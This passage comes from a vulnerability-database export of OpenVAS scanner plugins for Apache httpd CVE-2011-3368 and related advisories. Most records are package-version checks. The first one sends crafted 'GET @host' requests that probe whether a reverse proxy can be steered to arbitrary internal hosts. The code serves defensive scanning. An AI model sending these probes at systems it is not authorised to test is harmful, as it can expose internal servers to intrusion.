script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"apache/banner\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!get_port_state(port))exit(0);\n\nbanner = get_http_banner(port: port);\nif(banner && (\"Apache\" >!< banner && banner !~ \"HTTP/1.. 50[2|3]\"))exit(0);\n\nreq = string(\"GET @localhost HTTP/1.0\\r\\n\\r\\n\");\nresult = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(ereg(pattern:\"HTTP/1.. 400\", string:result))exit(0); # 400 means not vulnerable\n\nip3 = \"5555.6666.7777.8888\"; \n\nreq = string(\"GET @\", ip3 ,\" HTTP/1.0\\r\\n\\r\\n\");\n\nresult2 = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(ereg(pattern:\"HTTP/1.. 200\", string:result2) && \"Bad Gateway\" >< result2 ||\n ereg(pattern:\"HTTP/1.. 502\", string:result2)) { \n\n security_message(port:port);\n exit(0);\n \n} \n\n# CVE-2011-4317\nreq = string(\"GET @localhost::65535 HTTP/1.0\\r\\n\\r\\n\");\nresult = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(ereg(pattern:\"HTTP/1.. 503\", string:result)) {\n security_message(port:port);\n exit(0);\n} \n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:07", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:881450", "href": "http://plugins.openvas.org/nasl.php?oid=881450", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\");\n script_id(881450);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:54:04 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:33", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-10-21T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2011:1392-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870505", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870505", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2011:1392-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00016.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870505\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"RHSA\", value:\"2011:1392-01\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"RedHat Update for httpd RHSA-2011:1392-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(5|4)\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881450", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881450", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881450\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:54:04 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-11-11T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881032", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-November/018171.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881032\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:54:14 +0530 (Fri, 11 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 4\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:38:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos5 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881436", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881436", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-October/018125.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881436\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:52:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos5 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:42", "description": "Oracle Linux Local Security Checks ELSA-2011-1391", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2011-1391", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122068", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122068", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1391.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122068\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:12:32 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1391\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1391 - httpd security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1391\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1391.html\");\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n 